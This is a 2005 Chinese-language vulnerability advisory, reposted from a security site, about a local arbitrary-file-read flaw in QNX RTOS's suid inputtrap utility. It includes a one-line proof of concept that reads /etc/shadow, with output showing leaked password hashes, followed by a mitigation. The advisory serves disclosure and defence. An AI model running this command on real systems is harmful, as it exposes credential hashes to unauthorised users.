QNX RTOS InputTrap本地任意文件泄漏漏洞
来源:岁月联盟
时间:2005-08-26
更新日期:2005-08-25
受影响系统:
QNX RTOS 6.3.0
QNX RTOS 6.1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14656
QNX RTOS是嵌入式设备的微内核操作系统,inputtrap是QNX中用于检测和启动输入管理器的工具。
inputtrap中的’-t’标签用于指定将要读取的trap文件。由于错误的权限检查,除了拥有’start’标签的文件外用户还可以管理访问磁盘中的任意文件。
<*来源:Julio Cesar Fort (julio@rfdslabs.com.br)
Lucien Rocha
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112490406301882&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
$Content$nbsp;inputtrap -t /etc/shadow start
options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table
options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 删除inputtrap suid位或将其权限更改为可信任的用户组。
厂商补丁:
QNX
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.qnx.com/
上一篇:榕基每周漏洞播报
